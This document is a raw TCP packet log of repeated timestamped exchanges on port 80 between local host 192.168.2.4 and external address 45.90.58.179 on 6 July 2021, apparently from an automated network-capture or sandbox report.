Jul 6, 2021 14:30:49.811851978 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811872005 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811892986 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811918020 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811934948 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.811939955 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811961889 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.811984062 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.811985016 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812005997 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812030077 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812031984 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812052965 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812062025 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812076092 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812103987 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812108994 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812128067 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812151909 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812160969 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812169075 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812186956 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812205076 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812222004 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812246084 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812268019 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812289000 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812314987 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812339067 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812359095 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812364101 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812387943 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812395096 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812410116 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812433004 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812437057 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812455893 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812463999 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812478065 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812500954 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812503099 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812520981 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:49.812541962 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:49.812566042 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:50.068135977 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:50.106596947 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:50.106626034 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:50.106638908 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:50.106656075 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:50.106683016 CEST	80	49866	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:50.106709003 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:50.106741905 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:50.945943117 CEST	49866	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:50.946065903 CEST	49867	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.232625961 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.234049082 CEST	49869	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.269942045 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.270073891 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.271142960 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.278917074 CEST	80	49869	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.279022932 CEST	49869	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.308455944 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327635050 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327667952 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327687979 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327723980 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327723026 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327745914 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327754021 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327764988 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327781916 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327790976 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327800989 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327811003 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327820063 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327835083 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327841997 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.327861071 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327877045 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.327898979 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368022919 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368066072 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368127108 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368135929 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368146896 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368170977 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368185997 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368189096 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368206024 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368223906 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368227005 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368244886 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368257999 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368262053 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368280888 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368283987 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368303061 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368310928 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368321896 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368339062 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368375063 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368382931 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368396997 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368417025 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368417025 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368451118 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368452072 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368467093 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368470907 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368488073 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368489027 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368505001 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368511915 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368521929 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.368531942 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.368556023 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407191992 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407222033 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407239914 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407257080 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407305956 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407329082 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407361984 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407388926 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407860041 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407880068 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407902002 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407919884 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407933950 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407937050 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407948971 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.407953978 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407972097 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407988071 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.407990932 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408005953 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408025980 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408029079 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408040047 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408052921 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408066034 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408075094 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408083916 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408096075 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408113003 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408128977 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408144951 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408153057 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408163071 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408179045 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408194065 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408200979 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408215046 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408220053 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408233881 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408260107 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408262968 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408272982 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408291101 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408303976 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408312082 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408330917 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408348083 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408353090 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408361912 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408375025 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408390999 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408402920 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408416033 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408432007 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408433914 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408436060 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408447981 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.408457041 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408495903 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.408512115 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444200993 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444258928 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444304943 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444335938 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444371939 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444391966 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444411039 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444439888 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444504976 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444514036 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444528103 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444547892 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444565058 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444571018 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444581032 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.444612026 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.444638968 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445594072 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445652008 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445669889 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445688009 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445679903 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445704937 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445705891 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445727110 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445741892 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445746899 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445755959 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445765018 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445780993 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445781946 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445816040 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445822954 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445837975 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445846081 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445859909 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445868015 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445882082 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445893049 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445909977 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445933104 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.445935011 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445956945 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.445969105 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446026087 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446005106 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446073055 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446125984 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446149111 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446171045 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446171045 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446192980 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446208954 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446216106 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446235895 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446243048 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446268082 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446271896 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446290970 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446297884 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446322918 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446331024 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446352959 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446373940 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446393967 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446394920 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446420908 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446423054 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446455956 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446465015 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446479082 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446491957 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446510077 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446515083 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446537971 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446552992 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446571112 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446594000 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446600914 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446614981 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446636915 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446649075 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446690083 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446806908 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446856022 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446878910 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446902037 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446908951 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446928024 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446938992 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446948051 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446971893 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.446985960 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.446994066 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447027922 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447045088 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447052956 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447074890 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447077036 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447102070 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447140932 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447158098 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447170019 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447184086 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447206020 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447228909 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447230101 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447251081 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447282076 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447299004 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447302103 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447320938 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447321892 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447345018 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447366953 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447371006 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447424889 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447437048 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447438955 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447547913 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447570086 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447591066 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447613001 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447635889 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447635889 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447655916 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447663069 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447688103 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447690010 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447710037 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447712898 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.447748899 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.447772980 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481508970 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481543064 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481563091 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481581926 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481601000 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481609106 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481621981 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481636047 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481642008 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481664896 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481667995 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481687069 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481689930 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481708050 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481724024 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481729031 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481749058 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481755972 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481770039 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481789112 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481791019 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481810093 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481817007 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481833935 CEST	80	49868	45.90.58.179	192.168.2.4
